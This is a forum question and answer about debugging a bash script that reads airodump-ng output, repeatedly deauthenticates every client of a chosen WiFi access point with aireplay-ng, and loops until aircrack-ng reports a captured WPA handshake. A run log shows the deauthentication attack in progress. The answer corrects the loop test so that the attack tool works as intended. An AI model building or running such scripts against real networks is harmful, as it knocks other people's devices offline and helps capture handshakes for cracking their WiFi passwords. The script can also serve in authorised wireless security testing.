Trying to figure out how to get this until loop to kill the script when it actually has any data returned. i've tried -z, -n etc with no luck. This script is designed to take any airodump-ng output for a specific BSSID (in csv format), and iterate through each station and deauthenticate them infinitely on a period of 5m until $SUCCESS returns that a 4way handshake was captured
Any help would be greatly appreciated!
#!/bin/bash
#Need to get the BSSID Name
echo "BSSID Name? (Case Sensitive): "
read BSSIDNAME
BSSID=$(cat "$1" | awk -F',' 'NR>2{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d' | sed -n 1p)
until [ "$SUCCESS" -n ]; do
for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' | sed -e '/^.$/d' ); do
aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
sleep 5s;
done
SUCCESS=$(aircrack-ng "${BSSIDNAME}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done
Here is the debug output. You can see that it loops even though we recieved a handshake.
root@Pineapple:/sd/pcap# sh -x ./autodeauth.sh attackme-01.csv
+ echo BSSID Name? (Case Sensitive):
BSSID Name? (Case Sensitive):
+ read BSSIDNAME
attackme
+ + + sed -n 1p
awk -F, NR>2{print $1}
sed -e /Station MAC/d -e /BSSID/d -e /\n/d
+ cat attackme-01.csv
+ BSSID=00:11:11:11:11:11
+ [ -n ]
sh: -n: unknown operand
+ awk+ -F,sed+ NR>5{print $1} -esed
/Station MAC/d -e -e /^.$/d /BSSID/d
+ cat attackme-01.csv
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:00 wlan1mon
05:41:31 Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:31 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
05:41:32 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|60 ACKs]
05:41:33 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|55 ACKs]
05:41:33 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|56 ACKs]
05:41:34 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
+ sleep 5s
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:01 wlan1mon
05:41:39 Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:40 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|49 ACKs]
05:41:40 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|60 ACKs]
05:41:42 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|63 ACKs]
+ sleep 5s
+ grep WPA (. handshake)
+ aircrack-ng attackme-01.cap -w fakewordlist
+ SUCCESS= 1 00:11:11:11:11:11 attackeme WPA (1 handshake)
+ [ 1 00:11:11:11:11:11 attackme WPA (1 handshake) -n ]
sh: -n: unknown operand
The line:
SUCCESS=$(something)
will run something once and store the output into the SUCCESS environment variable.
Your until loop body never runs that command explicitly so I think you may believe that $SUCCESS in the until statement is somehow running the command.
That is not the case. It's simply re-evaluating the SUCCESS variable. You need to explicitly re-run the command, such as with:
SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
until [ -n "$SUCCESS" ]; do
for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d'); do
aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
sleep 5m;
done
SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done
Without that penultimate line, the SUCCESS variable is never actually changing, which would explain why your loop never exits.
You'll hopefully notice the other change that I made to your code, that of changing the line:
until [ "$SUCCESS" -n ]; do
into:
until [ -n "$SUCCESS" ]; do
The latter is the correct way to test if the SUCCESS environment variable holds a non-empty string.